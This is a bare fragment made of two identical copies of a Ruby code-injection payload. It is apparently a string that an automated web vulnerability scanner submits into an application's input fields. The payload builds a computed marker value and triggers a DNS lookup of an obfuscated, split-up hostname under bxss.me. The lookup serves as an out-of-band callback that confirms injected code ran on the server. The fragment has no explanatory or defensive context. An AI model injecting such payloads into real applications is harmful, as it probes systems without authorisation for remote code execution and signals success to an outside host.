"+"A".concat(70-3).concat(22*4).concat(98).concat(70).concat(121).concat(80)+(require"socket" Socket.gethostbyname("hitgi"+"hlsyeiga156e4.bxss.me.")[3].to_s)+"

"+"A".concat(70-3).concat(22*4).concat(98).concat(70).concat(121).concat(80)+(require"socket" Socket.gethostbyname("hitgi"+"hlsyeiga156e4.bxss.me.")[3].to_s)+"